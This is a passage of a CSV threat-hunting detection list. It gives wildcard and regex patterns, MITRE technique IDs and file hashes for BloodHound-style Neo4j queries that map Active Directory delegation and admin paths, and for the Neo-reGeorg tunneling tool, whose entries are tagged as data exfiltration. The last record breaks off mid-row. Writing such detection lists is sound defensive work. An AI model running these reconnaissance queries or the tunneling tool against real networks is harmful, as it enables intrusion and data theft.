c*",".{0,1000}MATCH\s\(c\:Computer\s\{unconsraineddelegation\:true\}\)\sRETURN\sc.{0,1000}","greyware_tool_keyword","Neo4j","Neo4j queries - Computers in Unconstrained Delegations","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - 
TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","greyware tool - risks of False positive !","5","10","N/A","N/A","N/A","N/A" "*MATCH (c:Computer)*(t:Computer)* *-[:AllowedToDelegate]* return p*",".{0,1000}MATCH\s\(c\:Computer\).{0,1000}\(t\:Computer\).{0,1000}\s.{0,1000}\-\[\:AllowedToDelegate\].{0,1000}\sreturn\sp.{0,1000}","greyware_tool_keyword","Neo4j","Neo4j queries - Computers AllowedToDelegate to other computers","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*MATCH p=(u:User)-[:SQLAdmin]*(c:Computer) return p*",".{0,1000}MATCH\sp\=\(u\:User\)\-\[\:SQLAdmin\].{0,1000}\(c\:Computer\)\sreturn\sp.{0,1000}","greyware_tool_keyword","Neo4j","Neo4j queries - Potential SQL Admins","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*neo4j start*",".{0,1000}neo4j\sstart.{0,1000}","greyware_tool_keyword","Neo4j","Neo4j queries - Computers AllowedToDelegate to other computers","T1210.002 - T1078.003 - T1046","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://hideandsec.sh/books/cheatsheets-82c/page/active-directory","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "* neoreg.py *",".{0,1000}\sneoreg\.py\s.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*.py 
*--proxy socks5://*",".{0,1000}\.py\s.{0,1000}\-\-proxy\ssocks5\:\/\/.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*/neoreg.py*",".{0,1000}\/neoreg\.py.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*/Neo-reGeorg.git*",".{0,1000}\/Neo\-reGeorg\.git.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*/NeoreGeorg.java*",".{0,1000}\/NeoreGeorg\.java.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*/Neo-reGeorg/tarball*",".{0,1000}\/Neo\-reGeorg\/tarball.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" 
"*/Neo-reGeorg/zipball*",".{0,1000}\/Neo\-reGeorg\/zipball.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*/tunnel.nosocket.php*",".{0,1000}\/tunnel\.nosocket\.php.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","1","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*[Ask NeoGeorg] NeoGeorg *",".{0,1000}\[Ask\sNeoGeorg\]\sNeoGeorg\s.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","N/A","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*005f37654d164e5605ad7180a7af68d82da9b747e6fed34b71f6fda0883e6f74*",".{0,1000}005f37654d164e5605ad7180a7af68d82da9b747e6fed34b71f6fda0883e6f74.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*01f7bb1226ad5d0c68b39ab60014b9e9f55ef85c56be7b0faed70d67bfbc13e5*",".{0,1000}01f7bb1226ad5d0c68b39ab60014b9e9f55ef85c56be7b0faed70d67bfbc13e5.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - 
TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*0a539ea3eb8e7708241c05a746cf459f027e1bb4ab54e870bbcbe63e3f7a6de9*",".{0,1000}0a539ea3eb8e7708241c05a746cf459f027e1bb4ab54e870bbcbe63e3f7a6de9.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*0f0c16e48d436603eff91f1a31043abb24df99f91a26ff8e73577d45b1152de5*",".{0,1000}0f0c16e48d436603eff91f1a31043abb24df99f91a26ff8e73577d45b1152de5.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*10a63c922b6d9bec0f3b7a8d755a01b815d81556eb93f2526db0b5a36c597d6e*",".{0,1000}10a63c922b6d9bec0f3b7a8d755a01b815d81556eb93f2526db0b5a36c597d6e.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*10d4bd7d47330656a50ba2557cd66ed93ea8a0010ef366f34b1a5e20e159297b*",".{0,1000}10d4bd7d47330656a50ba2557cd66ed93ea8a0010ef366f34b1a5e20e159297b.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - 
TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*11c11bef98644223da8b9e1242b046e58a04a844b6c6a6fb88b7818f296ecdb3*",".{0,1000}11c11bef98644223da8b9e1242b046e58a04a844b6c6a6fb88b7818f296ecdb3.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*12324526e79390f63e86cb9b7cebd7029d8da32fc2f73f2486517d0b451da60f*",".{0,1000}12324526e79390f63e86cb9b7cebd7029d8da32fc2f73f2486517d0b451da60f.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*213ace4b0c02f038549af071ee3e0033da7e88cd8f809d257b4c9b2dc81b9f4d*",".{0,1000}213ace4b0c02f038549af071ee3e0033da7e88cd8f809d257b4c9b2dc81b9f4d.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*2fdef205058424a234864a4f77be2f451f1e52608781fb0ec10fdf867d2b4dfb*",".{0,1000}2fdef205058424a234864a4f77be2f451f1e52608781fb0ec10fdf867d2b4dfb.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*32ea3247b4e572e80e116ae9a9ffb122c0766b0cc546c6122dab07da5aefde16*",".{0,1000}32ea3247b4e572e80e116ae9a9ffb122c0766b0cc546c6122dab07da5aefde16.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*3c139c9ae721f89e61a98294cb486143ee435297beff1a6178cc7347b4ff278e*",".{0,1000}3c139c9ae721f89e61a98294cb486143ee435297beff1a6178cc7347b4ff278e.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*3d735de00aeb9535224e29d0adb6f2fefc79b7a46f76702af0d8eebcd49c1772*",".{0,1000}3d735de00aeb9535224e29d0adb6f2fefc79b7a46f76702af0d8eebcd49c1772.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*43791d1689cb309eac4e6e9748f86decf655732c3790d10ec2d30962900d52e2*",".{0,1000}43791d1689cb309eac4e6e9748f86decf655732c3790d10ec2d30962900d52e2.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*478256ef0c35f13ada15baea0dd8a7e09c40ef2ff2e0a54a83681d920b93ba8a*",".{0,1000}478256ef0c35f13ada15baea0dd8a7e09c40ef2ff2e0a54a83681d920b93ba8a.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*56bf15ccd413e54239dde9103fa9e0bdbdfd5f3788855dbfec3fbe0e6a003b98*",".{0,1000}56bf15ccd413e54239dde9103fa9e0bdbdfd5f3788855dbfec3fbe0e6a003b98.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*585ed5d6cb415cd94af39825a85dfec415f92249a8d57b5a6159537720958f42*",".{0,1000}585ed5d6cb415cd94af39825a85dfec415f92249a8d57b5a6159537720958f42.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*5a5cbc0b756cbda7a9ac64ca5a0ad33899bd3ea9ae42113389c230a164900b74*",".{0,1000}5a5cbc0b756cbda7a9ac64ca5a0ad33899bd3ea9ae42113389c230a164900b74.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*5ab3fd2f7133bb9d297ebdfda1c2cf7af45baf3149b7d29932202e2ccb79c21f*",".{0,1000}5ab3fd2f7133bb9d297ebdfda1c2cf7af45baf3149b7d29932202e2ccb79c21f.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*695626bd1c10bf40379744a91ceefd71c27261b26b959d87de5c2ec74bced1a4*",".{0,1000}695626bd1c10bf40379744a91ceefd71c27261b26b959d87de5c2ec74bced1a4.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*6c4a877eb0a3bc495d7490c2f218678005a10cd6e978a92c497791b980ca8567*",".{0,1000}6c4a877eb0a3bc495d7490c2f218678005a10cd6e978a92c497791b980ca8567.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*7cde37e49b52a6ea480783c572a2fd04afcae330251ac65bbbc77b1c37faca6b*",".{0,1000}7cde37e49b52a6ea480783c572a2fd04afcae330251ac65bbbc77b1c37faca6b.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*7ea80cfb998032be5b67dc614fc40087e1e36383e59a46616c9d03405c08af3c*",".{0,1000}7ea80cfb998032be5b67dc614fc40087e1e36383e59a46616c9d03405c08af3c.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*806ad9ce802f8e110440ed228eddc40d82dad33ca0feaae1530d1490edb34d90*",".{0,1000}806ad9ce802f8e110440ed228eddc40d82dad33ca0feaae1530d1490edb34d90.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*807ed1ebbac824f29a84235afe7522ddbb66bf392a7c1f5ea849a5f0aedf1d20*",".{0,1000}807ed1ebbac824f29a84235afe7522ddbb66bf392a7c1f5ea849a5f0aedf1d20.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*82fab464a4b0e1f1e284ec32370edd5090637c682ba7e7e609f2f5bb95c78c4b*",".{0,1000}82fab464a4b0e1f1e284ec32370edd5090637c682ba7e7e609f2f5bb95c78c4b.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*8cc5a818d4db91362257001f7bb7995841bf3d83bc8d91e16a4329797b937cac*",".{0,1000}8cc5a818d4db91362257001f7bb7995841bf3d83bc8d91e16a4329797b937cac.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*92e23b3baec268e8b8eea8833e0d1aa5c2cf337ca20be4ceb2880d8aaaf89d4a*",".{0,1000}92e23b3baec268e8b8eea8833e0d1aa5c2cf337ca20be4ceb2880d8aaaf89d4a.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*9a468a1e3f8e645593dc25d5cb45d6b640da574e07afcc518e07eb1738a68510*",".{0,1000}9a468a1e3f8e645593dc25d5cb45d6b640da574e07afcc518e07eb1738a68510.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*9aa4b36654c9a2d7883a745ab791bcfc723ddcf793c4109529c1b8d8bbea41f0*",".{0,1000}9aa4b36654c9a2d7883a745ab791bcfc723ddcf793c4109529c1b8d8bbea41f0.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*9fc57548ab7ea8aed9b35ff5a6ceee11afd5707139f98333381fcc1442bc45aa*",".{0,1000}9fc57548ab7ea8aed9b35ff5a6ceee11afd5707139f98333381fcc1442bc45aa.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*a10a179116e873452ca3323ce17ae870ea2a240c754b696dcfd3442e7bbc16a7*",".{0,1000}a10a179116e873452ca3323ce17ae870ea2a240c754b696dcfd3442e7bbc16a7.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*a3f949008272bef1ec57519e2417f80fcdfcb633eda2c0c0e102062ffe37e62f*",".{0,1000}a3f949008272bef1ec57519e2417f80fcdfcb633eda2c0c0e102062ffe37e62f.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*a7c3d70099b1df9cb3165a8b5885fa727a778f3b3526811c0b5f16c30dccc492*",".{0,1000}a7c3d70099b1df9cb3165a8b5885fa727a778f3b3526811c0b5f16c30dccc492.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*aa244cce94120eeaef5bb7aa7e11a129662a50ecd4a0d542ae4a425b5757daf7*",".{0,1000}aa244cce94120eeaef5bb7aa7e11a129662a50ecd4a0d542ae4a425b5757daf7.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*ab7eed3ed5928eb01b0676183186172a6a23711c645ba6f97081efaf3b0d2fec*",".{0,1000}ab7eed3ed5928eb01b0676183186172a6a23711c645ba6f97081efaf3b0d2fec.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*b0c4f83b23c0bd366537a33642050c0ddfb4184d969dbf2e934903873a801953*",".{0,1000}b0c4f83b23c0bd366537a33642050c0ddfb4184d969dbf2e934903873a801953.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*b2b717b196a443ae5421b0e6cb1656d29034ede9c604bf04fec2bddaeba5dcf8*",".{0,1000}b2b717b196a443ae5421b0e6cb1656d29034ede9c604bf04fec2bddaeba5dcf8.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*baf1e7bdd6feedd6b9144fed16093bd281ce26dc0da57137a5385fc7a5fc498f*",".{0,1000}baf1e7bdd6feedd6b9144fed16093bd281ce26dc0da57137a5385fc7a5fc498f.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*c09e5a6ac3d8fb135b20e08d1550b54ea0ea84da2bcdaf2dbfa739f607804b88*",".{0,1000}c09e5a6ac3d8fb135b20e08d1550b54ea0ea84da2bcdaf2dbfa739f607804b88.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*c4183ce1d991cb27ef71b811f373222759494d1cf1db55dccce83405d0d570d3*",".{0,1000}c4183ce1d991cb27ef71b811f373222759494d1cf1db55dccce83405d0d570d3.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/L-codes/Neo-reGeorg","1","0","#filehash","N/A","10","10","2821","437","2024-08-05T05:41:01Z","2019-07-08T14:25:42Z" "*c938afbd5c475a7071dbc1912a4b5c211f7c8bbbae1c2389989c2115a08d7a0d*",".{0,1000}c938afbd5c475a7071dbc1912a4b5c211f7c8bbbae1c2389989c2115a08d7a0d.{0,1000}","greyware_tool_keyword","Neo-reGeorg","Neo-reGeorg is a project that seeks to aggressively refactor reGeorg","T1090 - T1095 - T1572","TA0003 - TA0011 - TA0005 - TA0010","N/A","N/A","Data 
